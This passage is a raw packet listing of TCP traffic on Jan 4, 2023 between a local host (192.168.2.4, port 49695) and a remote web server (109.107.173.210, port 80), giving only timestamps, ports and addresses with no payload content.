Jan 4, 2023 16:47:24.033338070 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033374071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033392906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033421040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033432007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033479929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033483028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033524990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033534050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033574104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033586979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033621073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033633947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033672094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033689976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033730984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033731937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033777952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033797979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033828020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033860922 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033893108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033896923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.033957958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.033966064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034025908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034028053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034073114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034090042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034120083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034132957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034168005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034178972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034214020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034226894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034261942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034271955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034310102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034334898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034369946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034375906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034416914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034420967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034466028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034472942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034513950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034519911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034563065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034567118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034610987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034616947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034663916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034671068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034730911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034749985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034799099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034826994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034847021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034864902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034894943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034903049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034945965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.034949064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.034992933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035006046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035042048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035048008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035089016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035094976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035136938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035141945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035185099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035190105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035232067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035235882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035280943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035285950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035329103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035334110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035383940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035614967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035665035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035691023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035712004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.035713911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.035778999 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.061872959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.061952114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062017918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062064886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062098026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062113047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062124968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062156916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062164068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062192917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062222004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062258005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062268019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062277079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062314987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062319994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062366962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062367916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062416077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062417984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062465906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062468052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062513113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062515020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062561989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062562943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062608957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062612057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062659025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062659979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062709093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062745094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062794924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062804937 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062824965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062861919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062872887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062884092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062921047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.062921047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062972069 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.062973976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063021898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063021898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063071012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063071012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063117981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063119888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063167095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063168049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063215017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063219070 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063262939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063263893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063312054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063312054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063359022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063363075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063410997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063411951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063461065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063462019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063508034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063509941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063559055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063561916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063605070 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063606977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063652992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063654900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063702106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063704014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063750982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063752890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063796997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063798904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063844919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063847065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063895941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063896894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063946009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.063947916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063992023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.063994884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064039946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064043999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064090014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064090967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064137936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064138889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064184904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064186096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064234018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064244986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064284086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064287901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064328909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064331055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064378977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064385891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064425945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064428091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064474106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064476013 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064518929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064522028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064569950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064573050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064644098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064646959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064697027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064697981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064744949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064783096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064794064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064795971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064841986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064845085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064891100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064905882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064939022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.064943075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064990997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.064992905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065036058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065040112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065088034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065089941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065133095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065136909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065185070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065186024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065231085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065234900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065282106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065288067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065329075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065330982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065378904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065380096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065413952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065432072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065462112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065463066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065507889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065510035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065555096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065557957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065606117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065608025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065656900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065686941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065704107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065706015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065753937 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065757036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065803051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065805912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065849066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065853119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065897942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065900087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065949917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065979004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.065996885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.065998077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066046000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066061020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066106081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066107035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066154003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066163063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066199064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066200018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066242933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066247940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066293955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066294909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066339970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066342115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066385984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066390038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066437006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066437960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066483021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066485882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066533089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066539049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066577911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066579103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066623926 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066627026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066672087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066673994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066723108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066741943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066788912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066793919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066837072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066839933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066884995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066890955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066914082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.066935062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066960096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.066975117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.067020893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.067043066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.067068100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.067074060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.067114115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093055964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093091965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093116045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093135118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093137026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093161106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093178034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093183994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093205929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093225956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093226910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093240023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093250036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093271017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093276024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093292952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093300104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093316078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093329906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093338013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093358040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093358994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093388081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093394041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093394041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093411922 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093430042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093449116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093456030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093477964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093483925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093501091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093513012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093522072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093539953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093545914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093555927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093569040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093578100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093594074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093597889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093616009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093627930 CET	49695	80	192.168.2.4	109.107.173.210
